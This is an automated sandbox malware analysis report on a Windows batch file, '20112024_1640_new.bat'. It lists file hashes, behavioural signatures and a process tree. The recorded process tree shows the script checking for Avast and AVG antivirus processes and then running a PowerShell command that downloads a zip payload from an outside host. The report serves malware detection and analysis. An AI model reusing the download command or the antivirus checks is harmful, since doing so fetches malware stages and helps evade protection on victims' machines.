Analysis
-
max time kernel
239s -
max time network
240s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
20-11-2024 16:40
Static task
static1
Behavioral task
behavioral1
Sample
20112024_1640_new.bat
Resource
win7-20240729-en
windows7-x64
5 signatures
300 seconds
General
-
Target
20112024_1640_new.bat
-
Size
3KB
-
MD5
072bfacf745a6d9d2fcd710dc0eddc2c
-
SHA1
b926adccaf5181c12713164a57f878316cfcdabc
-
SHA256
283a4a43c44d9bc096c52ad644bd77f2129e65fbc8e1964e419f39d1cba4386d
-
SHA512
568f3b32c0839bd4830e22ffad8d50f0cfcea3e294e5d7952132da956c412c33305cc0bca1f5df08848edd4296d3e1d00cb6206a4ef172d5b769b35c49166f4b
Malware Config
Signatures
-
pid Process 2812 powershell.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 2108 tasklist.exe 2872 tasklist.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2812 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2108 tasklist.exe Token: SeDebugPrivilege 2872 tasklist.exe Token: SeDebugPrivilege 2812 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2268 wrote to memory of 2108 2268 cmd.exe 30 PID 2268 wrote to memory of 2108 2268 cmd.exe 30 PID 2268 wrote to memory of 2108 2268 cmd.exe 30 PID 2268 wrote to memory of 2584 2268 cmd.exe 31 PID 2268 wrote to memory of 2584 2268 cmd.exe 31 PID 2268 wrote to memory of 2584 2268 cmd.exe 31 PID 2268 wrote to memory of 2872 2268 cmd.exe 33 PID 2268 wrote to memory of 2872 2268 cmd.exe 33 PID 2268 wrote to memory of 2872 2268 cmd.exe 33 PID 2268 wrote to memory of 2876 2268 cmd.exe 34 PID 2268 wrote to memory of 2876 2268 cmd.exe 34 PID 2268 wrote to memory of 2876 2268 cmd.exe 34 PID 2268 wrote to memory of 2812 2268 cmd.exe 35 PID 2268 wrote to memory of 2812 2268 cmd.exe 35 PID 2268 wrote to memory of 2812 2268 cmd.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\20112024_1640_new.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq AvastUI.exe"2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2108
-
-
C:\Windows\system32\find.exefind /i "AvastUI.exe"2⤵PID:2584
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq avgui.exe"2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
-
C:\Windows\system32\find.exefind /i "avgui.exe"2⤵PID:2876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://timebasebsan.shop:4045/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2812
-